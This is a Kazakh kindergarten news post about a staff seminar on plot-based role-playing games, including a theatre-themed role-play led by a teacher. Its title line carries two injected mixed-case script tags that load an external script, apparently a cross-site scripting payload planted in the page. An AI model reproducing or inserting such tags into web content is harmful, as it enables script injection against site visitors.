Балабақшада сюжеттік – рөлдік ойындарды қолданудың тиімділігі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

05.02.2019

          Біздің  №2 «Жұлдыз» балабақшамызда 2019 ж. 25 қаңтар күні  «Балабақшада сюжеттік – рөлдік ойындарды ұйымдастыру» тақырыбында  тәрбиелік мәні бар семинар  өткізілді. Қазақ тілі мұғалімі Токсанбаева З.Е.  және тәрбиеші Турлубекова Г.А. баяндамаларын оқып, педагогтардың назарын слайд арқылы сюжеттік – рөлдік ойындарды қолданудың тиімділігіне  аударды. Сюжеттік – рөлдік ойындар  арқылы педагогтар балалардың сөздік қорын байытады, жеке тұлға ретінде жан-жақты дамытуға мүмкіндік туғызады,  олардың шығармашылық қабілеттерін дамыта алады. Содан соң тәрбиеші Турлубекова Г.А. педагогтармен «Театрға саяхат» деген сюжеттік – рөлдік ойынды ұйымдастырды. Тәрбиеші Турлубекова Г.А. педагогтардың шығармашылығын, белсенділігін арттыра отырып, бір – біріне  достық,  көмек көрсету сезімдерін нығайтты. Семинар жүйелі түрде, тартымды болып өтті.

Просмотров: 729


Пікір қосу



Деректерді қолтаңбаға қосу
Текст